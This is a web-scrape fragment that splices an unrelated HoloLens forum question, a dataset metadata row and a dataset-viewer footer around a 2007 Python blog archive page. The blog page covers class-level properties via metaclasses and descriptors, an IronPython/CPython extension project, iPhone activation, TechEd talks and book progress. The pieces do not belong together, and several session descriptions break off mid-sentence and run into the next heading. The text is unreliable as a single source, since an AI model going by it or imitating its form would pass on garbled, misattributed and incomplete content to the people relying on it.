@DrNeurosurg Thanks for your post. In my application, I need to send a picture fro HoloLens to pc for processing and then send back the result to HoloLens. I am really new to this, could you please let me know how I should modify the code? | https://forums.hololens.com/discussion/7980/udp-communication-solved | CC-MAIN-2019-51 | refinedweb | 1,500 | 51.75 |
Python Programming, news on the Voidspace Python Projects and all things techie.
Static Members on Classes
The .NET framework has static members on classes. These are effectively class attributes that behave like properties.
For example, the DateTime class (actually a .NET structure) has a static member Now that returns the current time. Not only is this very useful, but it makes code that uses it very clean.
>>> DateTime.Now
<System.DateTime object at 0x... [12/10/2007 10:24:49]>
>>>
I was thinking about how you could provide the same API from Python. We could implement this behaviour on an instance by using a property. However, when you access a property on the class you just get a reference to the property object.
... @property
... def thing(self):
... print 'triggered'
...
>>> Something.thing
<property object at 0x009D6FA8>
>>>
So, to do this from Python we need a property on the class of the class - which is a metaclass.
Below is an example that provides a 'current' property on the Python datetime class. (I didn't use now as this is already a class method that does the same thing).
class meta_datetime(type):
@property
def current(self):
return new_datetime.now()
class new_datetime(datetime):
__metaclass__ = meta_datetime
>>> new_datetime.current
2007-10-12 10:28:12.015000
>>>
Nice.
Of course by using a metaclass, you make your own code a bit more obscure [1]. You have to weigh up the balance between keeping your own code readable (by others), and presenting the nicest possible API.
Update
A commentor on my blog (called Frank Benkstein I think), suggests the following improvement using the descriptor protocol:
class current_datetime(object):
def __get__(self, instance, owner):
return owner.now()
class new_datetime(datetime):
current = current_datetime()
>>> new_datetime.current
new_datetime(2007, 10, 12, 18, 27, 57, 748366)
I think this is more readable than the metaclass solution.
Like this post? Digg it or Del.icio.us it.
Posted by Fuzzyman on 2007-10-12 10:49:32 | |
Categories: Python, IronPython, Hacking
Resolver Open Source Project: CPython Extensions from IronPython
Yesterday we had a London Python meetup at Thoughtworks (free beer and Pizza - thanks guys), organised by Simon Brunning. It was nice to catch up with people again, including Remi Delon who I haven't seen for way too long. He promises exciting new changes at Webfaction (extra processes and memory on all hosting accounts, new website etc) as soon as his business partner gets back from holiday and they can roll it out!
More exciting was the talk that my boss Giles gave about Resolver Systems. We've found interest in Resolver has come from an unexpectedly diverse range of industries, some from Financial Services (including our current customers), but also interest from genetics companies, and even people doing oil exploration and games development! A lot of them are using Python for working with data, and feel the pain of Excel a great deal. For them, Resolver seems like a ready made solution, but it means that Resolver playing well with CPython is becoming important far more quickly than we expected.
Giles has announced that Resolver will begin work on an Open Source project to get some CPython extensions working seamlessly with IronPython. We may well start with some part of the Scipy Suite. It will be a .NET integration layer allowing you to use the existing Windows CPython extensions (so it is not a port to C#), and Python code that uses these extensions will run unchanged on CPython and IronPython.
The hope is that after doing the work to get a couple of extensions working, we will basically have created a general solution, but we're not promising that yet.
We think that as well as providing business value to us, this is a great way for Resolver to contribute back to the Python community. We don't have a timescale, but it is important to us. And yes, we do want your help.
We know that it is a big job, but we also know that it isn't impossible. Seo has already done some work (basic proof of concept) on a 'ctypes-reflector' that can call into CPython extensions from .NET. This is also essentially a 'solved problem', but from the other way round, with Python.NET.
Like this post? Digg it or Del.icio.us it.
Posted by Fuzzyman on 2007-10-11 11:45:52 | |
Categories: Python, IronPython, Hacking, Work
iPhone Irony
Well, having been very good and decided that I didn't really need an iPhone I went ahead and got a new contract with a Nokia 6300. This replaces a Symbian based N70 which I was never happy with [1] and never used as anything more than a simple phone.
The 6300 is a mobile phone - plain and simple. It is slim with enough weight to feel solid and has a nice clean and bright user interface. For anyone who just wants a phone I can recommend it. My new contract is £12 a month and includes more minutes and texts than I will use - so I was pretty happy with it.
But... oh irony of sweet ironies, someone went and gave me an iPhone! It didn't have the 1.1.1 firmware, so I've been able to activate it, but haven't yet unlocked it. I agree in principle with everything Mark Pilgrim said about the iPhone, but...
This thing is frikkin awesome. It simply doesn't compare to any mobile device I've ever used. I can totally understand why people are prepared to invest hours hacking them. It really is game changing for phones and PDAs. The UI is very different to all the other platforms I've used, with countless little touches in that make it fun and easy to use.
I've only played with it over wifi, and beyond what I needed to activate I haven't installed anything, but the things I'm already impressed with include:
- The YouTube integration is fantastic
- The gmail client is very nice
- The google maps integration is impressive
- Google reader on safari works fine
- Google calendar via safari also works fine
- The way you zoom in and out to view parts of a web page in safari is genius
- Flicking through albums in the iPod is just plain sweet
Unfortunately my music collection is now ten gb and the iPhone only holds eight, but it's not like I need that much at any one time... (The camera is a bit above average for a phone camera - i.e. not brilliant, but you have a bigger screen to view it on.)
I don't have a data deal on my new contract, but I do have a data-only SIM that I use with a 3G modem when I commute. This SIM supports GPRS and EDGE so I'm hoping it will work with the iPhone. This means that I will still carry two phones (both slender beauties), but can ditch the iPod which is a step in the right direction. My main use for a PDA was as a calendar and a book reader. I stopped using a PDA because getting Windows Mobile based PDAs to sync with google calendar was difficult / impossible. The iPhone solves that problem, but I wonder if I will be able to use it as an ebook reader?
By the way, the tutorial followed to activate (and hopefully soon unlock) was: How to Unlock your iPhone.
Update
Now unlocked and working fine with my data-only T-mobile SIM. My Three network SIM doesn't work with the iPhone though.
To get data across the phone network I needed to set the correct APN for T-Mobile UK in the network settings.
Oh, and because the touch screen works by electrical conductivity you can't use your fingernails for more accurate touching.
Like this post? Digg it or Del.icio.us it.
Posted by Fuzzyman on 2007-10-11 11:15:15 | |
Categories: Computers, Life
IronPython and Resolver at TechEd Barcelona
November 5 - 9th in Barcelona is (yet another) Microsoft developer event: TechEd Europe.
I'll be demonstrating Resolver as a powerful application written with IronPython. Lucky the IronPython team are part of the Microsoft development team and not the Office team.
I'll be speaking along with Mahesh Prakriya and Martin Maly, both initimately involved with IronPython. Our session is:
WEB305 - "IronPython" and Dynamic Languages on .NETMahesh Prakriya , Martin Maly , Michael Foord.
IronPython also features in the following sessions:
WEB307 - Developing Data Driven Applications Using the New Dynamic Data Controls in ASP.NETShanku NiyogiASP.NET dynamic data controls are part of a powerful, rich new framework that lets you create data driven ASP.NET applications very easily. ASP.NET dynamic data controls do this by automatically discovering the schema at runtime, deriving behavior from the database and finally creating an ASP.NET page. Anything that can be inferred from the schema works with almost no user effort. If needed, the page can then.WEB315 - Silverlight, ASP.NET and Web Services in IronPython & IronRubyMahesh PrakriyaAfter attending this talk you will learn how to use dynamic languages (such as IronPython, Jscript, VBx and IronRuby) in Silverlight and ASP.net. The overall dynamic languages initiative and Dynamic Language Runtime (DLR) will also be covered. ASP.net and Silverlight are two great example hosts of DLR and the languages listed above are implemented on DLR. We will first demo Python and Ruby in Silverlight, then Python in ASP.net and will end with webservices demos.WEB08-IS - Building Languages With The Dynamic Language RuntimeMartin MalyDynamic the key pieces of the compiler and plug it into the DLR. If you are interested in compiler technology or dynamic languages, this talk is definitely for you.
Now my guess is that not many of my regular readers will be at TechEd, but if you'll be there then let me know and we'll grab a beer. There are lots of other sessions of course, and quite a few of them look interesting. I'll hopefully be attending sessions on functional and concurrent programming with .NET, working with database APIs (OLE DB, ODBC and Entity), introduction to the reflection API and a few more.
Like this post? Digg it or Del.icio.us it.
Posted by Fuzzyman on 2007-10-09 16:55:24 | |
Categories: General Programming, Work, IronPython
Testing in IronPython in Action
I've nearly finished writing the chapter on testing in IronPython in Action (just the summary to go) and I'm pretty pleased with it.
In this chapter I managed to cover:
- Some discussion of what unit testing is and why test
- Setting up a test framework for an application using unittest, and writing tests with it
- Mock objects
- Monkey patching
- A useful test pattern involving a Listener class
- Functional testing a GUI application (including writing a User Story)
- For the functional testing we need to use .NET threads for synchronously and asynchronously interacting with the GUI thread
I particularly like the functional test section, as it makes the example application 'dance'.
In a few weeks this chapter (along with the next three chapters) goes for its first review. After that I will probably make all the source code available for download, so that even if you don't by the book (shock and horror) you still get to play with the examples.
Like this post? Digg it or Del.icio.us it.
Posted by Fuzzyman on 2007-10-08 14:25:52 | |
Categories: IronPython, Writing
New Movable Python Demo, plus Other Randomations
I've had quite a few visitors to the Movable Python pages from this link:
The Movable Python demo version was out of date, so I've posted an updated one. The new free trial is good until May 2008.
A couple of months or so back I promised that 40% of all purchases would be split between the PSF and the OLPC project. Plus, once sales reached £500 Movable Python would be Open Sourced.
It's well over half the way towards that goal (around 65% actually) - so if you want to see Movable Python Open Source, you know what to do.
Oh, interesting link. Sam Ruby on why he thinks Python (and Perl!) has competent language designers (it is possible to specify source code encoding).
Interesting link number two. The OpenMoko project is an open cell phone platform. It is a great idea, and not too shabby an implementation either, but the specs of the first version were a little-too-raw for my tastes. Some guy with a great domain name, has posted the specs of the first version side by side with the next version (at one point slated for availability this month): The Open Source iPhone. The specs look very tasty, and there is a promise of basic functionality in the software. If it actually works as a phone (which isn't promised for Neo, the currently phone), then I think I will go for it. Mono works on OpenMoko, so both Python and IronPython should run (and through GTK# with IronPython it might be easier to create user interfaces).
Interesting link number three. A post by why on My Complete List Of Substitute Names For The Maneuver We Now Know To Be Monkeypatching. Could this really be a Ruby programmer acknowledging that rampant patching is not perhaps always the best of practises.
Interesting link number four. Developer versions of The Chumby are now available to order. Unfortunately only for shipping in the US, so I have an invite (they cost $180!) if anyone wants one. The Chumby is a soft toy with a programmable computer type widgety display thing and wifi built in. Widgets are written in Flash, but it runs Python, so it could be fun.
Like this post? Digg it or Del.icio.us it.
Posted by Fuzzyman on 2007-10-08 13:34:28 | |
Categories: Python, Projects, Computers, General Programming
Archives
This work is licensed under a Creative Commons Attribution-Share Alike 2.0 License.
Counter... | http://www.voidspace.org.uk/python/weblog/arch_d7_2007_10_06.shtml | CC-MAIN-2014-15 | refinedweb | 2,341 | 71.65 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.